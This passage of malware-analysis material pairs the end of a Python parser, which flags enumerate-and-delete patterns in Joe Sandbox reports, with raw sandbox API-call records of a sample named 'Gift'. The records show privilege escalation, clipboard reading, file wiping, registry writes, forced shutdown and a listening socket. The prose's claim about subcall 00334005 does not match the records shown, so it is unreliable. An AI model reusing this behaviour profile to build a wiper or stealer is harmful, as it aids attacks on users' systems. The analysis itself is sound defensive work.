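• Opcode ID: 0f1fc5ff3e439e90906c85e2aba2e6c32288f5b7b08488d98a547af709f39831
"""

# Assumed line format: optional 'Part of subcall function <addr>:' prefix, then
# <name>.<module>[(args)][,] ref: <addr>. Names may contain '::' and '@N'.
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[\w:@]+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
FIELD_RE = re.compile(r"^\s*•\s*(?P<key>[A-Za-z ]+?):\s*(?P<value>.*?)\s*$")

@dataclass
class ApiCall:
    name: str
    module: str
    args: Tuple[str, ...]
    ref: str
    subcall_of: Optional[str]   # helper address when the call is only reached via a subcall

@dataclass
class FunctionRecord:
    api_id: str = ""
    opcode_id: str = ""
    source_file: str = ""
    calls: List[ApiCall] = field(default_factory=list)

    def api_names(self) -> set:
        """Direct and subcall names merged: what the function can reach."""
        return {c.name for c in self.calls}

def parse_records(text: str) -> List[FunctionRecord]:
    records: List[FunctionRecord] = []
    current: Optional[FunctionRecord] = None
    for line in text.splitlines():
        if line.strip() == "APIs":          # every record opens with this header
            current = FunctionRecord()
            records.append(current)
            continue
        if current is None:
            continue
        m = API_RE.match(line)
        if m:
            args = tuple(a for a in (m["args"] or "").split(",") if a)
            current.calls.append(ApiCall(m["name"], m["module"], args, m["ref"].upper(), m["sub"]))
            continue
        m = FIELD_RE.match(line)
        if m and m["key"] == "API ID":
            current.api_id = m["value"]
        elif m and m["key"] == "Opcode ID":
            current.opcode_id = m["value"]
        elif m and m["key"] == "Source File":
            current.source_file = m["value"].split(",")[0]   # drop ', Offset: ...'
    return records

# The three calls that together enumerate a directory and delete what is found.
WIPE_PATTERN = {"FindFirstFileW", "FindNextFileW", "DeleteFileW"}

def find_enumerate_and_delete(records: List[FunctionRecord]):
    """(opcode_id, sorted helper addresses) for each record whose merged call set
    holds the whole pattern; the helper addresses say where the loop really lives."""
    hits = []
    for rec in records:
        if WIPE_PATTERN <= rec.api_names():
            where = sorted({c.subcall_of for c in rec.calls if c.name in WIPE_PATTERN and c.subcall_of})
            hits.append((rec.opcode_id, where))
    return hits

def api_histogram(records: List[FunctionRecord]) -> Counter:
    """module!name counts across all records, for a quick import triage."""
    return Counter(f"{c.module}!{c.name}" for rec in records for c in rec.calls)

if __name__ == "__main__":
    recs = parse_records(SAMPLE_REPORT)
    print(find_enumerate_and_delete(recs), api_histogram(recs).most_common(3))
```

Because the sandbox attributes the four file calls to subcall 00334005 rather than to the function whose record they appear in, a check that only looked at a function's direct calls would miss the loop; merging direct and subcall names before matching, and reporting the helper address with the hit, is what makes the flag land on the right place. The same parser works on the records with no call lines at all (for example the bare `_fseek` or `ClearVariant` entries), which simply yield an empty call list.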
APIs
  • Part of subcall function 002D29E2: GetWindowLongW.USER32(?,000000EB), ref: 002D29F3
• DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0035D208
• SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0035D249
• GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0035D28E
• SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0035D2B8
• SendMessageW.USER32 ref: 0035D2E1
• _wcsncpy.LIBCMT ref: 0035D359
• GetKeyState.USER32(00000011), ref: 0035D37A
• GetKeyState.USER32(00000009), ref: 0035D387
• SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0035D39D
• GetKeyState.USER32(00000010), ref: 0035D3A7
• SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0035D3D0
• SendMessageW.USER32 ref: 0035D3F7
• SendMessageW.USER32(?,00001030,?,0035B9BA), ref: 0035D4FD
• ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0035D513
• ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0035D526
• SetCapture.USER32(?), ref: 0035D52F
• ClientToScreen.USER32(?,?), ref: 0035D594
• ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0035D5A1
• InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0035D5BB
• ReleaseCapture.USER32 ref: 0035D5C6
• GetCursorPos.USER32(?), ref: 0035D600
• ScreenToClient.USER32(?,?), ref: 0035D60D
• SendMessageW.USER32(?,00001012,00000000,?), ref: 0035D669
• SendMessageW.USER32 ref: 0035D697
• SendMessageW.USER32(?,00001111,00000000,?), ref: 0035D6D4
• SendMessageW.USER32 ref: 0035D703
• SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0035D724
• SendMessageW.USER32(?,0000110B,00000009,?), ref: 0035D733
• GetCursorPos.USER32(?), ref: 0035D753
• ScreenToClient.USER32(?,?), ref: 0035D760
• GetParent.USER32(?), ref: 0035D780
• SendMessageW.USER32(?,00001012,00000000,?), ref: 0035D7E9
• SendMessageW.USER32 ref: 0035D81A
• ClientToScreen.USER32(?,?), ref: 0035D878
• TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0035D8A8
• SendMessageW.USER32(?,00001111,00000000,?), ref: 0035D8D2
• SendMessageW.USER32 ref: 0035D8F5
• ClientToScreen.USER32(?,?), ref: 0035D947
• TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0035D97B
  • Part of subcall function 002D29AB: GetWindowLongW.USER32(?,000000EB), ref: 002D29BC
• GetWindowLongW.USER32(?,000000F0), ref: 0035DA17
Memory Dump Source
• Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
• Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
Similarity
• API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
• String ID: @GUI_DRAGID$F
APIs
  • Part of subcall function 00329399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 003293E3
  • Part of subcall function 00329399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00329410
  • Part of subcall function 00329399: GetLastError.KERNEL32 ref: 0032941D
• _memset.LIBCMT ref: 00328F71
• DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00328FC3
• CloseHandle.KERNEL32(?), ref: 00328FD4
• OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00328FEB
• GetProcessWindowStation.USER32 ref: 00329004
• SetProcessWindowStation.USER32(00000000), ref: 0032900E
• OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00329028
  • Part of subcall function 00328DE9: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00328F27), ref: 00328DFE
  • Part of subcall function 00328DE9: CloseHandle.KERNEL32(?,?,00328F27), ref: 00328E10
Similarity
• API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
• String ID: $default$winsta0
APIs
• OpenClipboard.USER32(00360980), ref: 0034465C
• IsClipboardFormatAvailable.USER32(0000000D), ref: 0034466A
• GetClipboardData.USER32(0000000D), ref: 00344672
• CloseClipboard.USER32 ref: 0034467E
• GlobalLock.KERNEL32(00000000), ref: 0034469A
• CloseClipboard.USER32 ref: 003446A4
• GlobalUnlock.KERNEL32(00000000,00000000), ref: 003446B9
• IsClipboardFormatAvailable.USER32(00000001), ref: 003446C6
• GetClipboardData.USER32(00000001), ref: 003446CE
• GlobalLock.KERNEL32(00000000), ref: 003446DB
• GlobalUnlock.KERNEL32(00000000,00000000,?), ref: 0034470F
• CloseClipboard.USER32 ref: 0034481F
Similarity
• API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
• String ID:
APIs
• FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 0033F5F9
• _wcscmp.LIBCMT ref: 0033F60E
• _wcscmp.LIBCMT ref: 0033F625
• GetFileAttributesW.KERNEL32(?), ref: 0033F637
• SetFileAttributesW.KERNEL32(?,?), ref: 0033F651
• FindNextFileW.KERNEL32(00000000,?), ref: 0033F669
• FindClose.KERNEL32(00000000), ref: 0033F674
• FindFirstFileW.KERNEL32(*.*,?), ref: 0033F690
• _wcscmp.LIBCMT ref: 0033F6B7
• _wcscmp.LIBCMT ref: 0033F6CE
• SetCurrentDirectoryW.KERNEL32(?), ref: 0033F6E0
• SetCurrentDirectoryW.KERNEL32(0038B578), ref: 0033F6FE
• FindNextFileW.KERNEL32(00000000,00000010), ref: 0033F708
• FindClose.KERNEL32(00000000), ref: 0033F715
• FindClose.KERNEL32(00000000), ref: 0033F727
Similarity
• API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
• String ID: *.*$S3
APIs
• FindFirstFileW.KERNEL32(?,?), ref: 0033CDD0
• FindClose.KERNEL32(00000000), ref: 0033CE24
• FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0033CE49
• FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0033CE60
• FileTimeToSystemTime.KERNEL32(?,?), ref: 0033CE87
• __swprintf.LIBCMT ref: 0033CED3
• __swprintf.LIBCMT ref: 0033CF16
  • Part of subcall function 002E1A36: _memmove.LIBCMT ref: 002E1A77
• __swprintf.LIBCMT ref: 0033CF6A
  • Part of subcall function 002F38C8: __woutput_l.LIBCMT ref: 002F3921
• __swprintf.LIBCMT ref: 0033CFB8
  • Part of subcall function 002F38C8: __flsbuf.LIBCMT ref: 002F3943
  • Part of subcall function 002F38C8: __flsbuf.LIBCMT ref: 002F395B
• __swprintf.LIBCMT ref: 0033D007
• __swprintf.LIBCMT ref: 0033D056
• __swprintf.LIBCMT ref: 0033D0A5
Similarity
• API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
• String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
APIs
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00350FB3
• RegCreateKeyExW.ADVAPI32(?,?,00000000,00360980,00000000,?,00000000,?,?), ref: 00351021
• RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00351069
• RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 003510F2
• RegCloseKey.ADVAPI32(?), ref: 00351412
• RegCloseKey.ADVAPI32(00000000), ref: 0035141F
Similarity
• API ID: Close$ConnectCreateRegistryValue
• String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
APIs
• FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 0033F756
• _wcscmp.LIBCMT ref: 0033F76B
• _wcscmp.LIBCMT ref: 0033F782
  • Part of subcall function 00334875: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00334890
• FindNextFileW.KERNEL32(00000000,?), ref: 0033F7B1
• FindClose.KERNEL32(00000000), ref: 0033F7BC
• FindFirstFileW.KERNEL32(*.*,?), ref: 0033F7D8
• _wcscmp.LIBCMT ref: 0033F7FF
• _wcscmp.LIBCMT ref: 0033F816
• SetCurrentDirectoryW.KERNEL32(?), ref: 0033F828
• SetCurrentDirectoryW.KERNEL32(0038B578), ref: 0033F846
• FindNextFileW.KERNEL32(00000000,00000010), ref: 0033F850
• FindClose.KERNEL32(00000000), ref: 0033F85D
• FindClose.KERNEL32(00000000), ref: 0033F86F
                                                                          Similarity
                                                                          • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                          • String ID: *.*$j3
                                                                          • API String ID: 1824444939-2549971785
                                                                          • Opcode ID: b8c295fb574b33501ce74ce82ba1d61e146141895b0952d48b068036273e7a02
                                                                          • Instruction ID: 1e5ed0909848ec96b3a99c07399b40f0865b1e5e9754f6b03a498ec73f1d078c
                                                                          • Opcode Fuzzy Hash: b8c295fb574b33501ce74ce82ba1d61e146141895b0952d48b068036273e7a02
                                                                          • Instruction Fuzzy Hash: 8B31163190021E6FDB1AEFB4DC89AEFB7AC9F09360F5045B5F904A61A0DB70CE458B60
                                                                          APIs
                                                                            • Part of subcall function 00328E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00328E3C
                                                                            • Part of subcall function 00328E20: GetLastError.KERNEL32(?,00328900,?,?,?), ref: 00328E46
                                                                            • Part of subcall function 00328E20: GetProcessHeap.KERNEL32(00000008,?,?,00328900,?,?,?), ref: 00328E55
                                                                            • Part of subcall function 00328E20: HeapAlloc.KERNEL32(00000000,?,00328900,?,?,?), ref: 00328E5C
                                                                            • Part of subcall function 00328E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00328E73
                                                                            • Part of subcall function 00328EBD: GetProcessHeap.KERNEL32(00000008,00328916,00000000,00000000,?,00328916,?), ref: 00328EC9
                                                                            • Part of subcall function 00328EBD: HeapAlloc.KERNEL32(00000000,?,00328916,?), ref: 00328ED0
                                                                            • Part of subcall function 00328EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00328916,?), ref: 00328EE1
                                                                          • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00328931
                                                                          • _memset.LIBCMT ref: 00328946
                                                                          • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00328965
                                                                          • GetLengthSid.ADVAPI32(?), ref: 00328976
                                                                          • GetAce.ADVAPI32(?,00000000,?), ref: 003289B3
                                                                          • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 003289CF
                                                                          • GetLengthSid.ADVAPI32(?), ref: 003289EC
                                                                          • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 003289FB
                                                                          • HeapAlloc.KERNEL32(00000000), ref: 00328A02
                                                                          • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00328A23
                                                                          • CopySid.ADVAPI32(00000000), ref: 00328A2A
                                                                          • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00328A5B
                                                                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00328A81
                                                                          • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00328A95
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                          • String ID:
                                                                          • API String ID: 3996160137-0
                                                                          • Opcode ID: 9d7decafb541fcb92285c52b290dbd1f43274fb7078cc814ee58a7000e713406
                                                                          • Instruction ID: d5f7bdcf8ec92477c49182ac03dcb58974e30e5c5c986926c9aa2f97763b3627
                                                                          • Opcode Fuzzy Hash: 9d7decafb541fcb92285c52b290dbd1f43274fb7078cc814ee58a7000e713406
                                                                          • Instruction Fuzzy Hash: DB615875901219FFDF06DFA5EC89EEEBB79FF04300F04812AE915A6290DB719A05CB60
                                                                          APIs
                                                                            • Part of subcall function 0035147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0035040D,?,?), ref: 00351491
                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00350B0C
                                                                            • Part of subcall function 002D4D37: __itow.LIBCMT ref: 002D4D62
                                                                            • Part of subcall function 002D4D37: __swprintf.LIBCMT ref: 002D4DAC
                                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00350BAB
                                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00350C43
                                                                          • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00350E82
                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 00350E8F
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                          • String ID:
                                                                          • API String ID: 1240663315-0
                                                                          • Opcode ID: cde7c545faea7f1fdd0b146b9a9780bd9091d5eb578c0aa4abb81b8837bcae93
                                                                          • Instruction ID: bf78a6b462653fe1559400bfc40154e94faf9b85731d9aa44dee786029d95bd9
                                                                          • Opcode Fuzzy Hash: cde7c545faea7f1fdd0b146b9a9780bd9091d5eb578c0aa4abb81b8837bcae93
                                                                          • Instruction Fuzzy Hash: 61E16C31204210AFCB19DF29C995E2BBBE9EF89314F04896DF889DB261DB31EC15CB51
                                                                          APIs
                                                                          • __swprintf.LIBCMT ref: 00334451
                                                                          • __swprintf.LIBCMT ref: 0033445E
                                                                            • Part of subcall function 002F38C8: __woutput_l.LIBCMT ref: 002F3921
                                                                          • FindResourceW.KERNEL32(?,?,0000000E), ref: 00334488
                                                                          • LoadResource.KERNEL32(?,00000000), ref: 00334494
                                                                          • LockResource.KERNEL32(00000000), ref: 003344A1
                                                                          • FindResourceW.KERNEL32(?,?,00000003), ref: 003344C1
                                                                          • LoadResource.KERNEL32(?,00000000), ref: 003344D3
                                                                          • SizeofResource.KERNEL32(?,00000000), ref: 003344E2
                                                                          • LockResource.KERNEL32(?), ref: 003344EE
                                                                          • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 0033454F
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                                          • String ID:
                                                                          • API String ID: 1433390588-0
                                                                          • Opcode ID: 9249e2fb7682f2010ff91a0863200cfe42d24f32a12808c8816209b7d41ab5e5
                                                                          • Instruction ID: 89565e752103a71abe2ac7c2a41933e449bb608f351fd1c374e62cb0359c1f6e
                                                                          • Opcode Fuzzy Hash: 9249e2fb7682f2010ff91a0863200cfe42d24f32a12808c8816209b7d41ab5e5
                                                                          • Instruction Fuzzy Hash: 0531A17190121AABDB169F60ED99ABB7BACEF05341F048825F916D6150E774EA20CB60
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                          • String ID:
                                                                          • API String ID: 1737998785-0
                                                                          • Opcode ID: 07d1630a74f72673deaffd8e0c9e098a0595788338ca852daaa7c9ecb5bfc395
                                                                          • Instruction ID: d5d85a7d410d853e8e6302e5fda96e67397319b858cc078632bc6d82a2832a17
                                                                          • Opcode Fuzzy Hash: 07d1630a74f72673deaffd8e0c9e098a0595788338ca852daaa7c9ecb5bfc395
                                                                          • Instruction Fuzzy Hash: A12195312112109FEB17AF60EC5AB2E77ADEF48711F01C425F9469B2A1DBB1AD10CB54
                                                                          APIs
                                                                            • Part of subcall function 002F0284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,002E2A58,?,00008000), ref: 002F02A4
                                                                            • Part of subcall function 00334FEC: GetFileAttributesW.KERNEL32(?,00333BFE), ref: 00334FED
                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 00333D96
                                                                          • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00333E3E
                                                                          • MoveFileW.KERNEL32(?,?), ref: 00333E51
                                                                          • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00333E6E
                                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00333E90
                                                                          • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00333EAC
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                                          • String ID: \*.*
                                                                          • API String ID: 4002782344-1173974218
                                                                          • Opcode ID: 63fa6558fd8440a2edb3018da747389358612b04e6c31ff1e86174e84f4da904
                                                                          • Instruction ID: 9b84b724992e6aa59402fa8b5e62ddfdab5a7122edb4127dfe625d25a00f03f3
                                                                          • Opcode Fuzzy Hash: 63fa6558fd8440a2edb3018da747389358612b04e6c31ff1e86174e84f4da904
                                                                          • Instruction Fuzzy Hash: DA51813284115DAACF16EBA1CA92DEEB779AF10301F608165E442B7192EF316F19CF61
                                                                          APIs
                                                                            • Part of subcall function 002E1A36: _memmove.LIBCMT ref: 002E1A77
                                                                          • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0033FA83
                                                                          • FindClose.KERNEL32(00000000), ref: 0033FB96
                                                                            • Part of subcall function 002D52B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 002D52E6
                                                                          • Sleep.KERNEL32(0000000A), ref: 0033FAB3
                                                                          • _wcscmp.LIBCMT ref: 0033FAC7
                                                                          • _wcscmp.LIBCMT ref: 0033FAE2
                                                                          • FindNextFileW.KERNEL32(?,?), ref: 0033FB80
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Find$File_wcscmp$CloseFirstMessageNextPeekSleep_memmove
                                                                          • String ID: *.*
                                                                          • API String ID: 2185952417-438819550
                                                                          • Opcode ID: de8058c8bb6c47ea8df0bf7756e75c2edfffefd6354da45fa1b8bfde74e5bbfa
                                                                          • Instruction ID: 7cb1ecb4b0e100e55275c534c461de10744511519a48611713ee703659bd33cb
                                                                          • Opcode Fuzzy Hash: de8058c8bb6c47ea8df0bf7756e75c2edfffefd6354da45fa1b8bfde74e5bbfa
                                                                          • Instruction Fuzzy Hash: D9418E71D4021A9FCF16DF64CC99AEEBBB9EF05350F548466E814A22A1EB309A54CF50
                                                                          APIs
                                                                            • Part of subcall function 00329399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 003293E3
                                                                            • Part of subcall function 00329399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00329410
                                                                            • Part of subcall function 00329399: GetLastError.KERNEL32 ref: 0032941D
                                                                          • ExitWindowsEx.USER32(?,00000000), ref: 003357B4
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                          • String ID: $@$SeShutdownPrivilege
                                                                          • API String ID: 2234035333-194228
                                                                          • Opcode ID: 425f44eeedef200ff253b09cdbcdce89595cd3c5ec9bb6de6c8645b15bb4eee2
                                                                          • Instruction ID: 270ae3319682e7c0f15666a0d79c46703e12c6718c473e6d4d868e2dff7fc1e4
                                                                          • Opcode Fuzzy Hash: 425f44eeedef200ff253b09cdbcdce89595cd3c5ec9bb6de6c8645b15bb4eee2
                                                                          • Instruction Fuzzy Hash: 74012631795712EAE72B62A4DCCBBBB725CEB04740F214429F913D60E2EA905C0081A0
                                                                          APIs
                                                                          • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 003469C7
                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 003469D6
                                                                          • bind.WSOCK32(00000000,?,00000010), ref: 003469F2
                                                                          • listen.WSOCK32(00000000,00000005), ref: 00346A01
                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 00346A1B
                                                                          • closesocket.WSOCK32(00000000,00000000), ref: 00346A2F
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
